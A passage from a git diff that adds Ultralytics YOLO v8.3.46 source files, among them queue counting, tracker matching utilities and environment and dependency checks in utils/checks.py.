self.track_data.id is not None: + im0 = cv2.addWeighted( + im0, + 0.5, + cv2.applyColorMap( + cv2.normalize(self.heatmap, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8), self.colormap + ), + 0.5, + 0, + ) + + self.display_output(im0) # display output with base class function + return im0 # return output image for more usage diff --git a/2024.ultralytics/v8.3.46/solutions/queue_management.py b/2024.ultralytics/v8.3.46/solutions/queue_management.py new file mode 100644 index 0000000..043bd37 --- /dev/null +++ b/2024.ultralytics/v8.3.46/solutions/queue_management.py @@ -0,0 +1,112 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from ultralytics.solutions.solutions import BaseSolution +from ultralytics.utils.plotting import Annotator, colors + + +class QueueManager(BaseSolution): + """ + Manages queue counting in real-time video streams based on object tracks. + + This class extends BaseSolution to provide functionality for tracking and counting objects within a specified + region in video frames. + + Attributes: + counts (int): The current count of objects in the queue. + rect_color (Tuple[int, int, int]): RGB color tuple for drawing the queue region rectangle. + region_length (int): The number of points defining the queue region. + annotator (Annotator): An instance of the Annotator class for drawing on frames. + track_line (List[Tuple[int, int]]): List of track line coordinates. + track_history (Dict[int, List[Tuple[int, int]]]): Dictionary storing tracking history for each object. + + Methods: + initialize_region: Initializes the queue region. + process_queue: Processes a single frame for queue management. + extract_tracks: Extracts object tracks from the current frame. + store_tracking_history: Stores the tracking history for an object. + display_output: Displays the processed output. + + Examples: + >>> cap = cv2.VideoCapture("Path/to/video/file.mp4") + >>> queue_manager = QueueManager(region=[100, 100, 200, 200, 300, 300]) + >>> while cap.isOpened(): + >>> success, im0 = cap.read() + >>> if not success: + >>> break + >>> out = queue.process_queue(im0) + """ + + def __init__(self, **kwargs): + """Initializes the QueueManager with parameters for tracking and counting objects in a video stream.""" + super().__init__(**kwargs) + self.initialize_region() + self.counts = 0 # Queue counts Information + self.rect_color = (255, 255, 255) # Rectangle color + self.region_length = len(self.region) # Store region length for further usage + + def process_queue(self, im0): + """ + Processes the queue management for a single frame of video. + + Args: + im0 (numpy.ndarray): Input image for processing, typically a frame from a video stream. + + Returns: + (numpy.ndarray): Processed image with annotations, bounding boxes, and queue counts. + + This method performs the following steps: + 1. Resets the queue count for the current frame. + 2. Initializes an Annotator object for drawing on the image. + 3. Extracts tracks from the image. + 4. Draws the counting region on the image. + 5. For each detected object: + - Draws bounding boxes and labels. + - Stores tracking history. + - Draws centroids and tracks. + - Checks if the object is inside the counting region and updates the count. + 6. Displays the queue count on the image. + 7. Displays the processed output. + + Examples: + >>> queue_manager = QueueManager() + >>> frame = cv2.imread("frame.jpg") + >>> processed_frame = queue_manager.process_queue(frame) + """ + self.counts = 0 # Reset counts every frame + self.annotator = Annotator(im0, line_width=self.line_width) # Initialize annotator + self.extract_tracks(im0) # Extract tracks + + self.annotator.draw_region( + reg_pts=self.region, color=self.rect_color, thickness=self.line_width * 2 + ) # Draw region + + for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss): + # Draw bounding box and counting region + self.annotator.box_label(box, label=self.names[cls], color=colors(track_id, True)) + self.store_tracking_history(track_id, box) # Store track history + + # Draw tracks of objects + self.annotator.draw_centroid_and_tracks( + self.track_line, color=colors(int(track_id), True), track_thickness=self.line_width + ) + + # Cache frequently accessed attributes + track_history = self.track_history.get(track_id, []) + + # store previous position of track and check if the object is inside the counting region + prev_position = None + if len(track_history) > 1: + prev_position = track_history[-2] + if self.region_length >= 3 and prev_position and self.r_s.contains(self.Point(self.track_line[-1])): + self.counts += 1 + + # Display queue counts + self.annotator.queue_counts_display( + f"Queue Counts : {str(self.counts)}", + points=self.region, + region_color=self.rect_color, + txt_color=(104, 31, 17), + ) + self.display_output(im0) # display output with base class function + + return im0 # return output image for more usage diff --git a/2024.ultralytics/v8.3.46/trackers/utils/matching.py b/2024.ultralytics/v8.3.46/trackers/utils/matching.py new file mode 100644 index 0000000..4a3a420 --- /dev/null +++ b/2024.ultralytics/v8.3.46/trackers/utils/matching.py @@ -0,0 +1,157 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import numpy as np +import scipy +from scipy.spatial.distance import cdist + +from ultralytics.utils.metrics import batch_probiou, bbox_ioa + +try: + import lap # for linear_assignment + + assert lap.__version__ # verify package is not directory +except (ImportError, AssertionError, AttributeError): + from ultralytics.utils.checks import check_requirements + + check_requirements("lap>=0.5.12") # https://github.com/gatagat/lap + import lap + + +def linear_assignment(cost_matrix: np.ndarray, thresh: float, use_lap: bool = True) -> tuple: + """ + Perform linear assignment using either the scipy or lap.lapjv method. + + Args: + cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M). + thresh (float): Threshold for considering an assignment valid. + use_lap (bool): Use lap.lapjv for the assignment. If False, scipy.optimize.linear_sum_assignment is used. + + Returns: + matched_indices (np.ndarray): Array of matched indices of shape (K, 2), where K is the number of matches. + unmatched_a (np.ndarray): Array of unmatched indices from the first set, with shape (L,). + unmatched_b (np.ndarray): Array of unmatched indices from the second set, with shape (M,). + + Examples: + >>> cost_matrix = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]) + >>> thresh = 5.0 + >>> matched_indices, unmatched_a, unmatched_b = linear_assignment(cost_matrix, thresh, use_lap=True) + """ + if cost_matrix.size == 0: + return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1])) + + if use_lap: + # Use lap.lapjv + # https://github.com/gatagat/lap + _, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh) + matches = [[ix, mx] for ix, mx in enumerate(x) if mx >= 0] + unmatched_a = np.where(x < 0)[0] + unmatched_b = np.where(y < 0)[0] + else: + # Use scipy.optimize.linear_sum_assignment + # https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.linear_sum_assignment.html + x, y = scipy.optimize.linear_sum_assignment(cost_matrix) # row x, col y + matches = np.asarray([[x[i], y[i]] for i in range(len(x)) if cost_matrix[x[i], y[i]] <= thresh]) + if len(matches) == 0: + unmatched_a = list(np.arange(cost_matrix.shape[0])) + unmatched_b = list(np.arange(cost_matrix.shape[1])) + else: + unmatched_a = list(set(np.arange(cost_matrix.shape[0])) - set(matches[:, 0])) + unmatched_b = list(set(np.arange(cost_matrix.shape[1])) - set(matches[:, 1])) + + return matches, unmatched_a, unmatched_b + + +def iou_distance(atracks: list, btracks: list) -> np.ndarray: + """ + Compute cost based on Intersection over Union (IoU) between tracks. + + Args: + atracks (list[STrack] | list[np.ndarray]): List of tracks 'a' or bounding boxes. + btracks (list[STrack] | list[np.ndarray]): List of tracks 'b' or bounding boxes. + + Returns: + (np.ndarray): Cost matrix computed based on IoU. + + Examples: + Compute IoU distance between two sets of tracks + >>> atracks = [np.array([0, 0, 10, 10]), np.array([20, 20, 30, 30])] + >>> btracks = [np.array([5, 5, 15, 15]), np.array([25, 25, 35, 35])] + >>> cost_matrix = iou_distance(atracks, btracks) + """ + if atracks and isinstance(atracks[0], np.ndarray) or btracks and isinstance(btracks[0], np.ndarray): + atlbrs = atracks + btlbrs = btracks + else: + atlbrs = [track.xywha if track.angle is not None else track.xyxy for track in atracks] + btlbrs = [track.xywha if track.angle is not None else track.xyxy for track in btracks] + + ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=np.float32) + if len(atlbrs) and len(btlbrs): + if len(atlbrs[0]) == 5 and len(btlbrs[0]) == 5: + ious = batch_probiou( + np.ascontiguousarray(atlbrs, dtype=np.float32), + np.ascontiguousarray(btlbrs, dtype=np.float32), + ).numpy() + else: + ious = bbox_ioa( + np.ascontiguousarray(atlbrs, dtype=np.float32), + np.ascontiguousarray(btlbrs, dtype=np.float32), + iou=True, + ) + return 1 - ious # cost matrix + + +def embedding_distance(tracks: list, detections: list, metric: str = "cosine") -> np.ndarray: + """ + Compute distance between tracks and detections based on embeddings. + + Args: + tracks (list[STrack]): List of tracks, where each track contains embedding features. + detections (list[BaseTrack]): List of detections, where each detection contains embedding features. + metric (str): Metric for distance computation. Supported metrics include 'cosine', 'euclidean', etc. + + Returns: + (np.ndarray): Cost matrix computed based on embeddings with shape (N, M), where N is the number of tracks + and M is the number of detections. + + Examples: + Compute the embedding distance between tracks and detections using cosine metric + >>> tracks = [STrack(...), STrack(...)] # List of track objects with embedding features + >>> detections = [BaseTrack(...), BaseTrack(...)] # List of detection objects with embedding features + >>> cost_matrix = embedding_distance(tracks, detections, metric="cosine") + """ + cost_matrix = np.zeros((len(tracks), len(detections)), dtype=np.float32) + if cost_matrix.size == 0: + return cost_matrix + det_features = np.asarray([track.curr_feat for track in detections], dtype=np.float32) + # for i, track in enumerate(tracks): + # cost_matrix[i, :] = np.maximum(0.0, cdist(track.smooth_feat.reshape(1,-1), det_features, metric)) + track_features = np.asarray([track.smooth_feat for track in tracks], dtype=np.float32) + cost_matrix = np.maximum(0.0, cdist(track_features, det_features, metric)) # Normalized features + return cost_matrix + + +def fuse_score(cost_matrix: np.ndarray, detections: list) -> np.ndarray: + """ + Fuses cost matrix with detection scores to produce a single similarity matrix. + + Args: + cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M). + detections (list[BaseTrack]): List of detections, each containing a score attribute. + + Returns: + (np.ndarray): Fused similarity matrix with shape (N, M). + + Examples: + Fuse a cost matrix with detection scores + >>> cost_matrix = np.random.rand(5, 10) # 5 tracks and 10 detections + >>> detections = [BaseTrack(score=np.random.rand()) for _ in range(10)] + >>> fused_matrix = fuse_score(cost_matrix, detections) + """ + if cost_matrix.size == 0: + return cost_matrix + iou_sim = 1 - cost_matrix + det_scores = np.array([det.score for det in detections]) + det_scores = np.expand_dims(det_scores, axis=0).repeat(cost_matrix.shape[0], axis=0) + fuse_sim = iou_sim * det_scores + return 1 - fuse_sim # fuse_cost diff --git a/2024.ultralytics/v8.3.46/utils/checks.py b/2024.ultralytics/v8.3.46/utils/checks.py new file mode 100644 index 0000000..fe858eb --- /dev/null +++ b/2024.ultralytics/v8.3.46/utils/checks.py @@ -0,0 +1,789 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import glob +import inspect +import math +import os +import platform +import re +import shutil +import subprocess +import time +from importlib import metadata +from pathlib import Path +from typing import Optional + +import cv2 +import numpy as np +import requests +import torch + +from ultralytics.utils import ( + ASSETS, + AUTOINSTALL, + IS_COLAB, + IS_GIT_DIR, + IS_KAGGLE, + IS_PIP_PACKAGE, + LINUX, + LOGGER, + MACOS, + ONLINE, + PYTHON_VERSION, + ROOT, + TORCHVISION_VERSION, + USER_CONFIG_DIR, + WINDOWS, + Retry, + SimpleNamespace, + ThreadingLocked, + TryExcept, + clean_url, + colorstr, + downloads, + emojis, + is_github_action_running, + url2file, +) + + +def parse_requirements(file_path=ROOT.parent / "requirements.txt", package=""): + """ + Parse a requirements.txt file, ignoring lines that start with '#' and any text after '#'. + + Args: + file_path (Path): Path to the requirements.txt file. + package (str, optional): Python package to use instead of requirements.txt file, i.e. package='ultralytics'. + + Returns: + (List[Dict[str, str]]): List of parsed requirements as dictionaries with `name` and `specifier` keys. + + Example: + ```python + from ultralytics.utils.checks import parse_requirements + + parse_requirements(package="ultralytics") + ``` + """ + if package: + requires = [x for x in metadata.distribution(package).requires if "extra == " not in x] + else: + requires = Path(file_path).read_text().splitlines() + + requirements = [] + for line in requires: + line = line.strip() + if line and not line.startswith("#"): + line = line.split("#")[0].strip() # ignore inline comments + match = re.match(r"([a-zA-Z0-9-_]+)\s*([<>!=~]+.*)?", line) + if match: + requirements.append(SimpleNamespace(name=match[1], specifier=match[2].strip() if match[2] else "")) + + return requirements + + +def parse_version(version="0.0.0") -> tuple: + """ + Convert a version string to a tuple of integers, ignoring any extra non-numeric string attached to the version. This + function replaces deprecated 'pkg_resources.parse_version(v)'. + + Args: + version (str): Version string, i.e. '2.0.1+cpu' + + Returns: + (tuple): Tuple of integers representing the numeric part of the version and the extra string, i.e. (2, 0, 1) + """ + try: + return tuple(map(int, re.findall(r"\d+", version)[:3])) # '2.0.1+cpu' -> (2, 0, 1) + except Exception as e: + LOGGER.warning(f"WARNING ⚠️ failure for parse_version({version}), returning (0, 0, 0): {e}") + return 0, 0, 0 + + +def is_ascii(s) -> bool: + """ + Check if a string is composed of only ASCII characters. + + Args: + s (str): String to be checked. + + Returns: + (bool): True if the string is composed only of ASCII characters, False otherwise. + """ + # Convert list, tuple, None, etc. to string + s = str(s) + + # Check if the string is composed of only ASCII characters + return all(ord(c) < 128 for c in s) + + +def check_imgsz(imgsz, stride=32, min_dim=1, max_dim=2, floor=0): + """ + Verify image size is a multiple of the given stride in each dimension. If the image size is not a multiple of the + stride, update it to the nearest multiple of the stride that is greater than or equal to the given floor value. + + Args: + imgsz (int | cList[int]): Image size. + stride (int): Stride value. + min_dim (int): Minimum number of dimensions. + max_dim (int): Maximum number of dimensions. + floor (int): Minimum allowed value for image size. + + Returns: + (List[int]): Updated image size. + """ + # Convert stride to integer if it is a tensor + stride = int(stride.max() if isinstance(stride, torch.Tensor) else stride) + + # Convert image size to list if it is an integer + if isinstance(imgsz, int): + imgsz = [imgsz] + elif isinstance(imgsz, (list, tuple)): + imgsz = list(imgsz) + elif isinstance(imgsz, str): # i.e. '640' or '[640,640]' + imgsz = [int(imgsz)] if imgsz.isnumeric() else eval(imgsz) + else: + raise TypeError( + f"'imgsz={imgsz}' is of invalid type {type(imgsz).__name__}. " + f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'" + ) + + # Apply max_dim + if len(imgsz) > max_dim: + msg = ( + "'train' and 'val' imgsz must be an integer, while 'predict' and 'export' imgsz may be a [h, w] list " + "or an integer, i.e. 'yolo export imgsz=640,480' or 'yolo export imgsz=640'" + ) + if max_dim != 1: + raise ValueError(f"imgsz={imgsz} is not a valid image size. {msg}") + LOGGER.warning(f"WARNING ⚠️ updating to 'imgsz={max(imgsz)}'. {msg}") + imgsz = [max(imgsz)] + # Make image size a multiple of the stride + sz = [max(math.ceil(x / stride) * stride, floor) for x in imgsz] + + # Print warning message if image size was updated + if sz != imgsz: + LOGGER.warning(f"WARNING ⚠️ imgsz={imgsz} must be multiple of max stride {stride}, updating to {sz}") + + # Add missing dimensions if necessary + sz = [sz[0], sz[0]] if min_dim == 2 and len(sz) == 1 else sz[0] if min_dim == 1 and len(sz) == 1 else sz + + return sz + + +def check_version( + current: str = "0.0.0", + required: str = "0.0.0", + name: str = "version", + hard: bool = False, + verbose: bool = False, + msg: str = "", +) -> bool: + """ + Check current version against the required version or range. + + Args: + current (str): Current version or package name to get version from. + required (str): Required version or range (in pip-style format). + name (str, optional): Name to be used in warning message. + hard (bool, optional): If True, raise an AssertionError if the requirement is not met. + verbose (bool, optional): If True, print warning message if requirement is not met. + msg (str, optional): Extra message to display if verbose. + + Returns: + (bool): True if requirement is met, False otherwise. + + Example: + ```python + # Check if current version is exactly 22.04 + check_version(current="22.04", required="==22.04") + + # Check if current version is greater than or equal to 22.04 + check_version(current="22.10", required="22.04") # assumes '>=' inequality if none passed + + # Check if current version is less than or equal to 22.04 + check_version(current="22.04", required="<=22.04") + + # Check if current version is between 20.04 (inclusive) and 22.04 (exclusive) + check_version(current="21.10", required=">20.04,<22.04") + ``` + """ + if not current: # if current is '' or None + LOGGER.warning(f"WARNING ⚠️ invalid check_version({current}, {required}) requested, please check values.") + return True + elif not current[0].isdigit(): # current is package name rather than version string, i.e. current='ultralytics' + try: + name = current # assigned package name to 'name' arg + current = metadata.version(current) # get version string from package name + except metadata.PackageNotFoundError as e: + if hard: + raise ModuleNotFoundError(emojis(f"WARNING ⚠️ {current} package is required but not installed")) from e + else: + return False + + if not required: # if required is '' or None + return True + + if "sys_platform" in required and ( # i.e. required='<2.4.0,>=1.8.0; sys_platform == "win32"' + (WINDOWS and "win32" not in required) + or (LINUX and "linux" not in required) + or (MACOS and "macos" not in required and "darwin" not in required) + ): + return True + + op = "" + version = "" + result = True + c = parse_version(current) # '1.2.3' -> (1, 2, 3) + for r in required.strip(",").split(","): + op, version = re.match(r"([^0-9]*)([\d.]+)", r).groups() # split '>=22.04' -> ('>=', '22.04') + if not op: + op = ">=" # assume >= if no op passed + v = parse_version(version) # '1.2.3' -> (1, 2, 3) + if op == "==" and c != v: + result = False + elif op == "!=" and c == v: + result = False + elif op == ">=" and not (c >= v): + result = False + elif op == "<=" and not (c <= v): + result = False + elif op == ">" and not (c > v): + result = False + elif op == "<" and not (c < v): + result = False + if not result: + warning = f"WARNING ⚠️ {name}{op}{version} is required, but {name}=={current} is currently installed {msg}" + if hard: + raise ModuleNotFoundError(emojis(warning)) # assert version requirements met + if verbose: + LOGGER.warning(warning) + return result + + +def check_latest_pypi_version(package_name="ultralytics"): + """ + Returns the latest version of a PyPI package without downloading or installing it. + + Args: + package_name (str): The name of the package to find the latest version for. + + Returns: + (str): The latest version of the package. + """ + try: + requests.packages.urllib3.disable_warnings() # Disable the InsecureRequestWarning + response = requests.get(f"https://pypi.org/pypi/{package_name}/json", timeout=3) + if response.status_code == 200: + return response.json()["info"]["version"] + except Exception: + return None + + +def check_pip_update_available(): + """ + Checks if a new version of the ultralytics package is available on PyPI. + + Returns: + (bool): True if an update is available, False otherwise. + """ + if ONLINE and IS_PIP_PACKAGE: + try: + from ultralytics import __version__ + + latest = check_latest_pypi_version() + if check_version(__version__, f"<{latest}"): # check if current version is < latest version + LOGGER.info( + f"New https://pypi.org/project/ultralytics/{latest} available 😃 " + f"Update with 'pip install -U ultralytics'" + ) + return True + except Exception: + pass + return False + + +@ThreadingLocked() +def check_font(font="Arial.ttf"): + """ + Find font locally or download to user's configuration directory if it does not already exist. + + Args: + font (str): Path or name of font. + + Returns: + file (Path): Resolved font file path. + """ + from matplotlib import font_manager + + # Check USER_CONFIG_DIR + name = Path(font).name + file = USER_CONFIG_DIR / name + if file.exists(): + return file + + # Check system fonts + matches = [s for s in font_manager.findSystemFonts() if font in s] + if any(matches): + return matches[0] + + # Download to USER_CONFIG_DIR if missing + url = f"https://github.com/ultralytics/assets/releases/download/v0.0.0/{name}" + if downloads.is_url(url, check=True): + downloads.safe_download(url=url, file=file) + return file + + +def check_python(minimum: str = "3.8.0", hard: bool = True, verbose: bool = False) -> bool: + """ + Check current python version against the required minimum version. + + Args: + minimum (str): Required minimum version of python. + hard (bool, optional): If True, raise an AssertionError if the requirement is not met. + verbose (bool, optional): If True, print warning message if requirement is not met. + + Returns: + (bool): Whether the installed Python version meets the minimum constraints. + """ + return check_version(PYTHON_VERSION, minimum, name="Python", hard=hard, verbose=verbose) + + +@TryExcept() +def check_requirements(requirements=ROOT.parent / "requirements.txt", exclude=(), install=True, cmds=""): + """ + Check if installed dependencies meet YOLOv8 requirements and attempt to auto-update if needed. + + Args: + requirements (Union[Path, str, List[str]]): Path to a requirements.txt file, a single package requirement as a + string, or a list of package requirements as strings. + exclude (Tuple[str]): Tuple of package names to exclude from checking. + install (bool): If True, attempt to auto-update packages that don't meet requirements. + cmds (str): Additional commands to pass to the pip install command when auto-updating. + + Example: + ```python + from ultralytics.utils.checks import check_requirements + + # Check a requirements.txt file + check_requirements("path/to/requirements.txt") + + # Check a single package + check_requirements("ultralytics>=8.0.0") + + # Check multiple packages + check_requirements(["numpy", "ultralytics>=8.0.0"]) + ``` + """ + prefix = colorstr("red", "bold", "requirements:") + if isinstance(requirements, Path): # requirements.txt file + file = requirements.resolve() + assert file.exists(), f"{prefix} {file} not found, check failed." + requirements = [f"{x.name}{x.specifier}" for x in parse_requirements(file) if x.name not in exclude] + elif isinstance(requirements, str): + requirements = [requirements] + + pkgs = [] + for r in requirements: + r_stripped = r.split("/")[-1].replace(".git", "") # replace git+https://org/repo.git -> 'repo' + match = re.match(r"([a-zA-Z0-9-_]+)([<>!=~]+.*)?", r_stripped) + name, required = match[1], match[2].strip() if match[2] else "" + try: + assert check_version(metadata.version(name), required) # exception if requirements not met + except (AssertionError, metadata.PackageNotFoundError): + pkgs.append(r) + + @Retry(times=2, delay=1) + def attempt_install(packages, commands): + """Attempt pip install command with retries on failure.""" + return subprocess.check_output(f"pip install --no-cache-dir {packages} {commands}", shell=True).decode() + + s = " ".join(f'"{x}"' for x in pkgs) # console string + if s: + if install and AUTOINSTALL: # check environment variable + n = len(pkgs) # number of packages updates + LOGGER.info(f"{prefix} Ultralytics requirement{'s' * (n > 1)} {pkgs} not found, attempting AutoUpdate...") + try: + t = time.time() + assert ONLINE, "AutoUpdate skipped (offline)" + LOGGER.info(attempt_install(s, cmds)) + dt = time.time() - t + LOGGER.info( + f"{prefix} AutoUpdate success ✅ {dt:.1f}s, installed {n} package{'s' * (n > 1)}: {pkgs}\n" + f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n" + ) + except Exception as e: + LOGGER.warning(f"{prefix} ❌ {e}") + return False + else: + return False + + return True + + +def check_torchvision(): + """ + Checks the installed versions of PyTorch and Torchvision to ensure they're compatible. + + This function checks the installed versions of PyTorch and Torchvision, and warns if they're incompatible according + to the provided compatibility table based on: + https://github.com/pytorch/vision#installation. + + The compatibility table is a dictionary where the keys are PyTorch versions and the values are lists of compatible + Torchvision versions. + """ + # Compatibility table + compatibility_table = { + "2.4": ["0.19"], + "2.3": ["0.18"], + "2.2": ["0.17"], + "2.1": ["0.16"], + "2.0": ["0.15"], + "1.13": ["0.14"], + "1.12": ["0.13"], + } + + # Extract only the major and minor versions + v_torch = ".".join(torch.__version__.split("+")[0].split(".")[:2]) + if v_torch in compatibility_table: + compatible_versions = compatibility_table[v_torch] + v_torchvision = ".".join(TORCHVISION_VERSION.split("+")[0].split(".")[:2]) + if all(v_torchvision != v for v in compatible_versions): + print( + f"WARNING ⚠️ torchvision=={v_torchvision} is incompatible with torch=={v_torch}.\n" + f"Run 'pip install torchvision=={compatible_versions[0]}' to fix torchvision or " + "'pip install -U torch torchvision' to update both.\n" + "For a full compatibility table see https://github.com/pytorch/vision#installation" + ) + + +def check_suffix(file="yolo11n.pt", suffix=".pt", msg=""): + """Check file(s) for acceptable suffix.""" + if file and suffix: + if isinstance(suffix, str): + suffix = (suffix,) + for f in file if isinstance(file, (list, tuple)) else [file]: + s = Path(f).suffix.lower().strip() # file suffix + if len(s): + assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}, not {s}" + + +def check_yolov5u_filename(file: str, verbose: bool = True): + """Replace legacy YOLOv5 filenames with updated YOLOv5u filenames.""" + if "yolov3" in file or "yolov5" in file: + if "u.yaml" in file: + file = file.replace("u.yaml", ".yaml") # i.e. yolov5nu.yaml -> yolov5n.yaml + elif ".pt" in file and "u" not in file: + original_file = file + file = re.sub(r"(.*yolov5([nsmlx]))\.pt", "\\1u.pt", file) # i.e. yolov5n.pt -> yolov5nu.pt + file = re.sub(r"(.*yolov5([nsmlx])6)\.pt", "\\1u.pt", file) # i.e. yolov5n6.pt -> yolov5n6u.pt + file = re.sub(r"(.*yolov3(|-tiny|-spp))\.pt", "\\1u.pt", file) # i.e. yolov3-spp.pt -> yolov3-sppu.pt + if file != original_file and verbose: + LOGGER.info( + f"PRO TIP 💡 Replace 'model={original_file}' with new 'model={file}'.\nYOLOv5 'u' models are " + f"trained with https://github.com/ultralytics/ultralytics and feature improved performance vs " + f"standard YOLOv5 models trained with https://github.com/ultralytics/yolov5.\n" + ) + return file + + +def check_model_file_from_stem(model="yolov8n"): + """Return a model filename from a valid model stem.""" + if model and not Path(model).suffix and Path(model).stem in downloads.GITHUB_ASSETS_STEMS: + return Path(model).with_suffix(".pt") # add suffix, i.e. yolov8n -> yolov8n.pt + else: + return model + + +def check_file(file, suffix="", download=True, download_dir=".", hard=True): + """Search/download file (if necessary) and return path.""" + check_suffix(file, suffix) # optional + file = str(file).strip() # convert to string and strip spaces + file = check_yolov5u_filename(file) # yolov5n -> yolov5nu + if ( + not file + or ("://" not in file and Path(file).exists()) # '://' check required in Windows Python<3.10 + or file.lower().startswith("grpc://") + ): # file exists or gRPC Triton images + return file + elif download and file.lower().startswith(("https://", "http://", "rtsp://", "rtmp://", "tcp://")): # download + url = file # warning: Pathlib turns :// -> :/ + file = Path(download_dir) / url2file(file) # '%2F' to '/', split https://url.com/file.txt?auth + if file.exists(): + LOGGER.info(f"Found {clean_url(url)} locally at {file}") # file already exists + else: + downloads.safe_download(url=url, file=file, unzip=False) + return str(file) + else: # search + files = glob.glob(str(ROOT / "**" / file), recursive=True) or glob.glob(str(ROOT.parent / file)) # find file + if not files and hard: + raise FileNotFoundError(f"'{file}' does not exist") + elif len(files) > 1 and hard: + raise FileNotFoundError(f"Multiple files match '{file}', specify exact path: {files}") + return files[0] if len(files) else [] # return file + + +def check_yaml(file, suffix=(".yaml", ".yml"), hard=True): + """Search/download YAML file (if necessary) and return path, checking suffix.""" + return check_file(file, suffix, hard=hard) + + +def check_is_path_safe(basedir, path): + """ + Check if the resolved path is under the intended directory to prevent path traversal. + + Args: + basedir (Path | str): The intended directory. + path (Path | str): The path to check. + + Returns: + (bool): True if the path is safe, False otherwise. + """ + base_dir_resolved = Path(basedir).resolve() + path_resolved = Path(path).resolve() + + return path_resolved.exists() and path_resolved.parts[: len(base_dir_resolved.parts)] == base_dir_resolved.parts + + +def check_imshow(warn=False): + """Check if environment supports image displays.""" + try: + if LINUX: + assert not IS_COLAB and not IS_KAGGLE + assert "DISPLAY" in os.environ, "The DISPLAY environment variable isn't set." + cv2.imshow("test", np.zeros((8, 8, 3), dtype=np.uint8)) # show a small 8-pixel image + cv2.waitKey(1) + cv2.destroyAllWindows() + cv2.waitKey(1) + return True + except Exception as e: + if warn: + LOGGER.warning(f"WARNING ⚠️ Environment does not support cv2.imshow() or PIL Image.show()\n{e}") + return False + + +def check_yolo(verbose=True, device=""): + """Return a human-readable YOLO software and hardware summary.""" + import psutil + + from ultralytics.utils.torch_utils import select_device + + if IS_COLAB: + shutil.rmtree("sample_data", ignore_errors=True) # remove colab /sample_data directory + + if verbose: + # System info + gib = 1 << 30 # bytes per GiB + ram = psutil.virtual_memory().total + total, used, free = shutil.disk_usage("/") + s = f"({os.cpu_count()} CPUs, {ram / gib:.1f} GB RAM, {(total - free) / gib:.1f}/{total / gib:.1f} GB disk)" + try: + from IPython import display + + display.clear_output() # clear display if notebook + except ImportError: + pass + else: + s = "" + + select_device(device=device, newline=False) + LOGGER.info(f"Setup complete ✅ {s}") + + +def collect_system_info(): + """Collect and print relevant system information including OS, Python, RAM, CPU, and CUDA.""" + import psutil + + from ultralytics.utils import ENVIRONMENT # scope to avoid circular import + from ultralytics.utils.torch_utils import get_cpu_info, get_gpu_info + + gib = 1 << 30 # bytes per GiB + cuda = torch and torch.cuda.is_available() + check_yolo() + total, used, free = shutil.disk_usage("/") + + info_dict = { + "OS": platform.platform(), + "Environment": ENVIRONMENT, + "Python": PYTHON_VERSION, + "Install": "git" if IS_GIT_DIR else "pip" if IS_PIP_PACKAGE else "other", + "RAM": f"{psutil.virtual_memory().total / gib:.2f} GB", + "Disk": f"{(total - free) / gib:.1f}/{total / gib:.1f} GB", + "CPU": get_cpu_info(), + "CPU count": os.cpu_count(), + "GPU": get_gpu_info(index=0) if cuda else None, + "GPU count": torch.cuda.device_count() if cuda else None, + "CUDA": torch.version.cuda if cuda else None, + } + LOGGER.info("\n" + "\n".join(f"{k:<20}{v}" for k, v in info_dict.items()) + "\n") + + package_info = {} + for r in parse_requirements(package="ultralytics"): + try: + current = metadata.version(r.name) + is_met = "✅ " if check_version(current, str(r.specifier), name=r.name, hard=True) else "❌ " + except metadata.PackageNotFoundError: + current = "(not installed)" + is_met = "❌ " + package_info[r.name] = f"{is_met}{current}{r.specifier}" + LOGGER.info(f"{r.name:<20}{package_info[r.name]}") + + info_dict["Package Info"] = package_info + + if is_github_action_running(): + github_info = { + "RUNNER_OS": os.getenv("RUNNER_OS"), + "GITHUB_EVENT_NAME": os.getenv("GITHUB_EVENT_NAME"), + "GITHUB_WORKFLOW": os.getenv("GITHUB_WORKFLOW"), + "GITHUB_ACTOR": os.getenv("GITHUB_ACTOR"), + "GITHUB_REPOSITORY": os.getenv("GITHUB_REPOSITORY"), + "GITHUB_REPOSITORY_OWNER": os.getenv("GITHUB_REPOSITORY_OWNER"), + } + LOGGER.info("\n" + "\n".join(f"{k}: {v}" for k, v in github_info.items())) + info_dict["GitHub Info"] = github_info + + return info_dict + + +def check_amp(model): + """ + Checks the PyTorch Automatic Mixed Precision (AMP) functionality of a YOLO11 model. If the checks fail, it means + there are anomalies with AMP on the system that may cause NaN losses or zero-mAP results, so AMP will be disabled + during training. + + Args: + model (nn.Module): A YOLO11 model instance. + + Example: + ```python + from ultralytics import YOLO + from ultralytics.utils.checks import check_amp + + model = YOLO("yolo11n.pt").model.cuda() + check_amp(model) + ``` + + Returns: + (bool): Returns True if the AMP functionality works correctly with YOLO11 model, else False. + """ + from ultralytics.utils.torch_utils import autocast + + device = next(model.parameters()).device # get model device + prefix = colorstr("AMP: ") + if device.type in {"cpu", "mps"}: + return False # AMP only used on CUDA devices + else: + # GPUs that have issues with AMP + pattern = re.compile( + r"(nvidia|geforce|quadro|tesla).*?(1660|1650|1630|t400|t550|t600|t1000|t1200|t2000|k40m)", re.IGNORECASE + ) + + gpu = torch.cuda.get_device_name(device) + if bool(pattern.search(gpu)): + LOGGER.warning( + f"{prefix}checks failed ❌. AMP training on {gpu} GPU may cause " + f"NaN losses or zero-mAP results, so AMP will be disabled during training." + ) + return False + + def amp_allclose(m, im): + """All close FP32 vs AMP results.""" + batch = [im] * 8 + imgsz = max(256, int(model.stride.max() * 4)) # max stride P5-32 and P6-64 + a = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # FP32 inference + with autocast(enabled=True): + b = m(batch, imgsz=imgsz, device=device, verbose=False)[0].boxes.data # AMP inference + del m + return a.shape == b.shape and torch.allclose(a, b.float(), 